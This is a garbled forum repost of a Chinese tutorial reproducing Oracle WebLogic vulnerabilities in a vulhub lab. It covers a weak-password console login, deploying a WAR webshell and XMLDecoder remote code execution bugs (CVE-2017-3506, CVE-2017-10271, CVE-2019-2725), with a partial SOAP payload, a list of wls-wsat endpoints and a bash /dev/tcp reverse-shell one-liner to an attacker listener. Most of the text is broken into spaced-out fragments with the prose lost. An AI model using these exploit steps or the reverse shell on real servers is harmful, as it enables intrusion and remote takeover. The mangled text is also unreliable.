[18613] 2021-08-09_干货最全的Weblogic漏洞复现

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-18
2021-08-09_干货最全的Weblogic漏洞复现   |   W e b l o g i c   m a t h w i z a r d   H A C K   2 0 2 1 - 0 8 - 0 9 # w e b l o g i c   , 1 #   , 1 2 W e b L o g i c O r a c l e a p p l i c a t i o n   s e r v e r J A V A E E W e b L o g i c W e b J a v a J a v a J a v a   E n t e r p r i s e W e b L o g i c O r a c l e B E A J a v a J 2 E E a p p l i c a t i o n   s e r v e r J 2 E E ,   1 2 c ( 1 2 . 2 . 1 . 4 )   W e b L o g i c   P o r t a l W e b L o g i c   I n t e g r a t i o n O r a c l e F u s i o n   M i d d l e w a r e W e b L o g i c   S e r v e r O E P E ( O r a c l e   E n t e r p r i s e   P a c k   f o r   E c l i p s e ) w e b l o g i c v u l h u b w e b l o g i c w e b s h e l l d o c k e r 访 7 0 0 1 4 0 4 w e a k _ p a s s w o r d
访 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 : 7 0 0 1 / c o n s o l e 使 b p 5 使 w e b l o g i c / O r a c l e @ 1 2 3
w a r w a r j s p 使 j a r   - c v f   a a a . w a r   .
a a a . w a r N e x t
a a a . w a r
a a a w a r s h e l l . j s p w a r C V E - 2 0 1 7 - 3 5 0 6 X M L D e c o d e r ( C V E - 2 0 1 7 - 3 5 0 6 ) / w l s - w s a t / C o o r d i n a t o r P o r t T y p e P O S T S O A P X M L X M L D e c o d e r w e b l o g i c . w s e e . j a x w s . w o r k c o n t e x t . W o r k C o n t e x t S e r v e r T u b e . p r o c e s s R e q u e s t w e b l o g i c . w s e e . j a x w s . w o r k c o n t e x t . W o r k C o n t e x t T u b e . r e a d H e a d e r O l d w e b l o g i c . w s e e . w o r k a r e a . W o r k C o n t e x t X m l I n p u t A d a p t e r w e b l o g i c . w s e e . j a x w s . w o r k c o n t e x t . W o r k C o n t e x t S e r v e r T u b e . p r o c e s s R e q u e s t
4 3 l o c a l H e a d e r 1 r e a d H e a d e r O l d ( ) l o c a l H e a d e r 1 4 1 w o r k : W o r k C o n t e x t   r e a d H e a d e r O l d ( ) w e b l o g i c . w s e e . j a x w s . w o r k c o n t e x t . W o r k C o n t e x t T u b e . r e a d H e a d e r O l d 1 0 6 n e w   W o r k C o n t e x t X m l I n p u t A d a p t e r ( n e w   B y t e A r r a y I n p u t S t r e a m ( l o c a l B y t e A r r a y O u t p u t S t r e a m . t o B y t e A r r a y ( ) ) ) W o r k C o n t e x t X m l I n p u t A d a p t e r ( ) W o r k C o n t e x t X m l I n p u t A d a p t e r X M L W o r k C o n t e x t X m l I n p u t A d a p t e r w e b l o g i c . w s e e . w o r k a r e a . W o r k C o n t e x t X m l I n p u t A d a p t e r   1 9 X M L D e c o d e r 使 w e b l o g i c 1 0 . 3 . 6 使 d o c k e r         < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " >                 < j a v a >   . . .             < / j a v a >           < / w o r k : W o r k C o n t e x t >   w e a k _ p a s s w o r d
访 w l s - w s a t j s p s h e l l / w l s - w s a t / C o o r d i n a t o r P o r t T y p e / w l s - w s a t / R e g i s t r a t i o n P o r t T y p e R P C / w l s - w s a t / P a r t i c i p a n t P o r t T y p e / w l s - w s a t / R e g i s t r a t i o n R e q u e s t e r P o r t T y p e / w l s - w s a t / C o o r d i n a t o r P o r t T y p e 1 1 / w l s - w s a t / R e g i s t r a t i o n P o r t T y p e R P C 1 1 / w l s - w s a t / P a r t i c i p a n t P o r t T y p e 1 1 / w l s - w s a t / R e g i s t r a t i o n R e q u e s t e r P o r t T y p e 1 1
C V E - 2 0 1 7 - 1 0 2 7 1 X M L D e c o d e r ( C V E - 2 0 1 7 - 1 0 2 7 1 ) C V E - 2 0 1 7 - 3 5 0 6 p a y l o a d 使 o b j e c t   t a g R C E C V E - 2 0 1 7 - 3 5 0 6 v a l i d a t e x m l E l e m e n t o b j e c t   t a g C V E - 2 0 1 7 - 1 0 2 7 1 使 v o i d   t a g R C E C V E - 2 0 1 7 - 1 0 2 7 1 o b j e c t n e w m e t h o d v o i d a r r a y v o i d i n d e x a r r a y c l a s s b y t e j a v a C V E - 2 0 1 7 - 1 0 2 7 1 d o c k e r 访 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 : 7 0 0 1 / w l s - w s a t / C o o r d i n a t o r P o r t T y p e b p 使 b a s h s h e l l n c w e b l o g i c / w s e e / w o r k a r e a / W o r k C o n t e x t X m l I n p u t A d a p t e r . j a v a / b i n / b a s h - c b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 1 . 2 / 5 5 5 5   0 > & 1
C V E - 2 0 1 9 - 2 7 2 5 w l s - w s a t ( C V E - 2 0 1 9 - 2 7 2 5 ) H T T P b e a _ w l s 9 _ a s y n c _ r e s p o n s e . w a r w s a t . w a r O r a c l e   W e b L o g i c   S e r v e r   1 0 . *   O r a c l e   W e b L o g i c   S e r v e r   1 2 . 1 . 3 C V E - 2 0 1 9 - 2 7 2 5 C V E - 2 0 1 7 - 1 0 2 7 1 c l a s s a r r a y l e n g t h 1 0 0 0 0 访
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则